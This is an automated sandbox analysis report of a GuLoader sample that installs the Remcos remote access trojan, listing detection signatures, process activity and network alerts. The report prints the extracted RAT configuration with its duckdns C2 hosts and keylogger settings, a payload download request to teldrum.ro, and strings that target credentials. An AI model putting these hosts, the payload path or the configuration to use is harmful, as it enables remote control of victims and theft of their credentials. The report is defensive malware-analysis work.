Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z58Swiftcopy_MT.bat.exe

Overview

General Information

Sample name:z58Swiftcopy_MT.bat.exe
Analysis ID:1586058
MD5:d82fc35769adac8d6c49087219b1cd93
SHA1:ff87686b1f399b3d68a580dc016e2c675b61d5c1
SHA256:8da8762a0f3794de100bd1800856136928880e8a9d0be42eb758809bca1bd0e3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • z58Swiftcopy_MT.bat.exe (PID: 2560 cmdline: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe" MD5: D82FC35769ADAC8D6C49087219B1CD93)
    • z58Swiftcopy_MT.bat.exe (PID: 5524 cmdline: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 2804 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 6432 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 4076 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs" MD5: D82FC35769ADAC8D6C49087219B1CD93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["wealthabundance01.duckdns.org:3981:1", "wealthabundance01.duckdns.org:3980:0", "wealthabundance002..duckdns.org:3980:0"], "Assigned name": "WEALTHBILLIONAIRES", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "wealthymannow-3N54OZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119JoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      C:\Users\user\AppData\Local\Temp\nsm9317.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  Click to see the 16 entries

                  Sigma Signatures

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe, ProcessId: 5524, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T17:13:17.032953+010020365941Malware Command and Control Activity Detected192.168.11.204974843.226.229.1963981TCP
                  2025-01-08T17:13:20.438465+010020365941Malware Command and Control Activity Detected192.168.11.204974943.226.229.1963981TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T17:13:19.851927+010028033043Unknown Traffic192.168.11.2049750178.237.33.5080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T17:13:13.491271+010028032702Potentially Bad Traffic192.168.11.2049747109.99.162.14443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["wealthabundance01.duckdns.org:3981:1", "wealthabundance01.duckdns.org:3980:0", "wealthabundance002..duckdns.org:3980:0"], "Assigned name": "WEALTHBILLIONAIRES", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "wealthymannow-3N54OZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Multi AV Scanner detection for submitted file
                  Source: z58Swiftcopy_MT.bat.exeReversingLabs: Detection: 21%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Machine Learning detection for sample
                  Source: z58Swiftcopy_MT.bat.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49747 version: TLS 1.2
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405861
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040639C FindFirstFileA,FindClose,0_2_0040639C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_33A710F1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A76580 FindFirstFileExA,2_2_33A76580
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49748 -> 43.226.229.196:3981
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49749 -> 43.226.229.196:3981
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: wealthabundance01.duckdns.org
                  Source: Malware configuration extractorURLs: wealthabundance01.duckdns.org
                  Source: Malware configuration extractorURLs: wealthabundance002..duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: wealthabundance01.duckdns.org
                  Source: global trafficTCP traffic: 192.168.11.20:49748 -> 43.226.229.196:3981
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49750 -> 178.237.33.50:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49747 -> 109.99.162.14:443
                  Source: global trafficHTTP traffic detected: GET /PmprpeY34.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /PmprpeY34.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478148334.0000000002288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478148334.0000000002288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.yahoo.com (Yahoo)
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478527078.0000000002A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prom
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478527078.0000000002A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"O